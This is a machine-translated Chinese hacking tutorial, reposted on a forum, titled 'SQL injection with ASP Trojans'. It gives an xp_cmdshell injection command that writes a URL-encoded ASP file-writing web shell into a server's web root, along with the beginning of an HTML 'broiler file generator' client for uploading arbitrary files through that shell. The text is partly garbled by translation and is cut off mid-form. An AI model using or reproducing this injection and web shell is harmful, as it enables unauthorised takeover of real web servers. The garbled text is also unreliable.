2. Tech
  3. SQL injection with ASP Trojans

SQL injection with ASP Trojans

xiaoxiao2021-03-06  39

This article is suitable for SA authority SQL Server database, and how can SQL to support the server SQL injection of FSO ASP, how to upload the treasure horses, have always been a more headache, and I have another way to upload the Trojan here. 1. When SQL is injected, use XP_cmdshell to write an ASP file that can write files on the server.

Contents of the file: <% Set objFSO = Server.CreateObject ( "Scripting.FileSystemObject") Set objCountFile = objFSO.CreateTextFile (request ( "mypath"), True) objCountFile.Write request ( "mydata") objCountFile.Close%> This file line can be written <% Set objFSO = Server.CreateObject ( "Scripting.FileSystemObject"): Set objCountFile = objFSO.CreateTextFile (request ( "mypath"), True): objCountFile.Write request ( "mydata"): objCountFile.Close% > Encoding special characters can get% 3C% 25set% 20ObJFSO% 20 =% 20 Server.createObject (% 22Scripting.FileSystemObject% 22): set% 20objcountFile = Objfso.createTextFile (Request (% 22myPath% 22), true): Objcountfile.write% 20Request (% 22myData% 22): objcountfile.close% 25% 3e injection (here the Web directory is c: / inetpub / wwwroot /): Exec master..xp_cmdshell 'echo "% 3C% 25set% 20objfso% 20 =% 20Server.CreateObject (% 22Scripting.FileSystemObject% 22): Set% 20objCountFile = objFSO.CreateTextFile (request (% 22mypath% 22), True): objCountFile.Write% 20request (% 22mydata% 22): objCountFile.Close% 25% 3e "> c: /inetpub/wwrow/ftp.asp '; this will generate an ftp.asp file in the server's web directory to generate the code of <% set objfso = server.create Object ("scripting.filesystemObject") set objcountfile = objfso.createtextfile (Request ("MyPath"), true) ObjcountFile.write Request ("MyData") ObjcountFile.Close%> You can see that two of the above code The interface mypath and mydata mypath are the generation of files for the next time the file MyData is the content of the file. The contents of the file are written in the local document: RohuClient.htm code is as follows broiler file generator - client production: absolute zero QQ: 12216796 </ Title> <style type =</p> <p>"Text / CSS"> <! line-height: 150%} body {font-size: 12px; font-family: Verdana, Arial, Helvetica, Sans-Serif, Song; Scrollbar -FACE-COLOR: #eeeeee; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: # dee3e7; SCROLLBAR-3DLIGHT-COLOR: # d1d7dc; SCROLLBAR-ARROW-COLOR: # 006699; SCROLLBAR-TRACK-COLOR: #EDEDED; SCROLLBAR-DARKSHADOW-Color: # 98aab1} A: LINK {font-size: 9pt; color: # 363636; line-height: 18px; text-decoration: none} A: visited {font-size: 9pt; color : # 363636; Line-Height: 18px; Text-Decoration: none} A: Hover {color: # cc0000; line-height: 18px; text-decoration: underline} Input, select, Textarea {Font-Family: "Tahoma" , "Arial", "Helvetica", "Sans-Serif", "Song"; Background-Color: # f9f9f9; font-size: 9pt; border: 1px # d2d2d2 dobble; line-height: 120%;} -> </ style> </ head> <script language = "javaScript" type = "text / javascript"> Function Chk (theform) {if (theform.ftpurl.value == ') {Alert (' Please enter the address of the submitted ! '); Theform.ftpurl.focus (); return false;} if (theform.mypath.value ==') {alert ('please Enter the location of the generated file! '); Theform.Mypath.focus (); return false;} if (theform.mydata.value ==') {Alert ('Please enter the content of the generated file!'); Theform.mydata.focus (); return False;} theform.action = theform.ftpurl.value;} </ script> <body> <form name = "RohuForm" method = "post" action = "" onSubmit = "Return Chk (this)" target = "_ blank "> <table width =" 673 "border =" 0 "align =" center "cellpadding =" 0 "cellspacing =" 0 "> <tr> <td width ="</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-52735.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="52735" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.032</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'mh0LFnBNBI1zEx7HsCdK7rXl2RP3k4D3LMrhYoeYLDRaATOESoSonCWosbUn_2BixGJ0Y4HeogxV2DrqHbNBxLWA_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>